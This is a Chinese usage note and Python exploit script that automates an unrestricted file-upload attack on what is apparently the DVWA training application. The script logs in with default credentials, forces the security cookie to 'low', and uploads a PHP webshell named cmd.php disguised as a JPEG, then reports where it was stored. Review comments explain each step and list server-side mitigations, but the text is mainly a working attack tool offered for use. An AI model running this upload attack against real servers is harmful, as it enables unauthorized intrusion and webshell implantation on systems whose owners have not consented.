用法(python3)
针对单个ip
d盘放个小马(D:\cmd.php)
url案例(只填协议、主机和端口,不带路径;脚本会自行拼接 /login.php 等路径)
http://xx.xx.xx.xx:9090
exp
import requests
import re
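# Scripted walk-through of an unrestricted file-upload flaw: fetch the login
# form, log in, force the difficulty cookie to "low", then post a .php file to
# the upload form and report the path the server echoes back.
# NOTE(review): the paths used here (/login.php, /vulnerabilities/upload/,
# ../../hackable/uploads/) match the layout of the DVWA training application;
# confirm before assuming anything about other targets.

# Base URL only (scheme://host:port); surrounding whitespace and a trailing
# slash are dropped so the path concatenations below do not produce "//".
url = input("请输入[http://127.0.0.1:8080]:"+'\n').strip().rstrip('/')

# Browser-like request headers. The original spelled the language header
# 'Accept-Lanuage', which servers ignore; corrected here.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
}

# Step 1: load the login form to obtain the session cookie and the anti-CSRF
# token embedded in the page.
index_url = url + '/login.php'
index_response = requests.get(url=index_url, headers=headers, timeout=5)

token_match = re.search(r"name='user_token' value='(.*?)'", index_response.text)
if token_match is None:
    # The original indexed findall(...)[0] and died with a bare IndexError when
    # the page was not the expected login form.
    raise SystemExit("user_token not found on /login.php")
user_token = token_match.group(1)

# Hard-coded credentials: the script only works against a target that still
# accepts them, which is itself a finding worth reporting.
post_data = {
    'username': 'admin',
    'password': 'password',
    'Login': 'Login',
    'user_token': user_token,
}

# Step 2: reuse the session cookie and overwrite the 'security' value. The
# level travels in a cookie the client can write, so the client chooses it.
cookies = requests.utils.dict_from_cookiejar(index_response.cookies)
cookies['security'] = 'low'

# NOTE(review): the login response is not inspected, as in the original; a
# failed login presumably only shows up as the final check failing.
requests.post(url=index_url, headers=headers, data=post_data, timeout=5, cookies=cookies)

# Step 3: visit the upload page (response unused, kept from the original flow).
upload_url = url + '/vulnerabilities/upload/'
requests.get(url=upload_url, headers=headers, timeout=5, cookies=cookies)

# Step 4: send the multipart upload. The part is named cmd.php but declared as
# image/jpeg; both values are supplied by the client, so a server that trusts
# either one is not validating anything. Server-side mitigations: allow-list
# extensions, verify the content itself, rename stored files, and keep uploads
# in a location where script execution is disabled.
# The file is opened in a context manager so the handle is always closed
# (the original leaked it), and the request now has a timeout like the others.
with open(r'D:\cmd.php', 'rb') as upload_file:
    files = {
        'MAX_FILE_SIZE': (None, '100000'),
        'uploaded': ('cmd.php', upload_file, 'image/jpeg'),
        'Upload': (None, 'Upload'),
        'user_token': (None, user_token),
    }
    r = requests.post(upload_url, files=files, headers=headers, cookies=cookies, timeout=5)

# Sample success body from the server:
#   <pre>../../hackable/uploads/cmd.php succesfully uploaded!</pre>
# The check below is loose: any response mentioning the file name counts.
if 'cmd.php' in r.text:
    res = re.findall(r'<pre>(.*?)</pre>', r.text)
    print("上传成功路径为:", res)
    print("-"*100)
else:
    print("连接错误")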